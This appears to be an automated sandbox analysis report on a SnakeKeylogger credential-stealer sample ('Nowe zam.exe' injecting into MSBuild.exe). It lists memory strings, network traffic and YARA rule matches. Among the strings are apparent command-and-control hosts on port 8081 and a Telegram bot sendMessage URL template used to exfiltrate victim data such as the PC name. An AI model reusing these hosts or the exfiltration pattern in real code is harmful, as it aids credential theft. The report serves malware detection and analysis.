                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.tlakovec.si
                  Source: Nowe zam.exe, 00000000.00000002.2344204160.0000000002840000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20a
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79$
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49733 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_0097D66C0_2_0097D66C
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_04B1DEE80_2_04B1DEE8
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F8BE00_2_050F8BE0
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050FF7180_2_050FF718
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F66E00_2_050F66E0
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050FC0C10_2_050FC0C1
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050FF2E00_2_050FF2E0
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F2C220_2_050F2C22
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F2C300_2_050F2C30
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F3F000_2_050F3F00
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F8E600_2_050F8E60
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F8E700_2_050F8E70
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F3EF00_2_050F3EF0
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F78900_2_050F7890
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F78B80_2_050F78B8
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F78C80_2_050F78C8
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050FFB410_2_050FFB41
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050FFB500_2_050FFB50
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F8BDE0_2_050F8BDE
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_050F0A080_2_050F0A08
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_090D59B80_2_090D59B8
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_090D0D900_2_090D0D90
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_090D11C80_2_090D11C8
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_090D11C50_2_090D11C5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2A0884_2_00F2A088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2C1474_2_00F2C147
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2D2784_2_00F2D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F253704_2_00F25370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2C4684_2_00F2C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2C7384_2_00F2C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F269A04_2_00F269A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2E9884_2_00F2E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F23A994_2_00F23A99
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2CA084_2_00F2CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2CCD84_2_00F2CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F23E094_2_00F23E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F26FC84_2_00F26FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2CFAA4_2_00F2CFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F229E04_2_00F229E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00F2F9614_2_00F2F961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B1E804_2_065B1E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B17A04_2_065B17A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BFC684_2_065BFC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B9C184_2_065B9C18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BE2584_2_065BE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B0B304_2_065B0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B93284_2_065B9328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B50284_2_065B5028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B29684_2_065B2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B1E704_2_065B1E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BDE004_2_065BDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BE6B04_2_065BE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BE6AF4_2_065BE6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BEF514_2_065BEF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BEF604_2_065BEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B178F4_2_065B178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BCCA04_2_065BCCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BD5504_2_065BD550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B95484_2_065B9548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BD5404_2_065BD540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BDDFF4_2_065BDDFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BE24A4_2_065BE24A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BEAF84_2_065BEAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BEB084_2_065BEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B0B204_2_065B0B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B8B914_2_065B8B91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BF3B84_2_065BF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B8BA04_2_065B8BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B00404_2_065B0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B501B4_2_065B501B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BF8104_2_065BF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BF8024_2_065BF802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B00064_2_065B0006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BD0F84_2_065BD0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B295B4_2_065B295B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BD9994_2_065BD999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065BD9A84_2_065BD9A8
                  Source: Nowe zam.exe, 00000000.00000002.2339393029.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Nowe zam.exe
                  Source: Nowe zam.exe, 00000000.00000002.2348087529.0000000009400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Nowe zam.exe
                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Nowe zam.exe
                  Source: Nowe zam.exe, 00000000.00000000.2304859558.0000000000258000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDuG.exe" vs Nowe zam.exe
                  Source: Nowe zam.exe, 00000000.00000002.2344204160.0000000002840000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Nowe zam.exe
                  Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000003E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Nowe zam.exe
                  Source: Nowe zam.exeBinary or memory string: OriginalFilenameDuG.exe" vs Nowe zam.exe
                  Source: Nowe zam.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
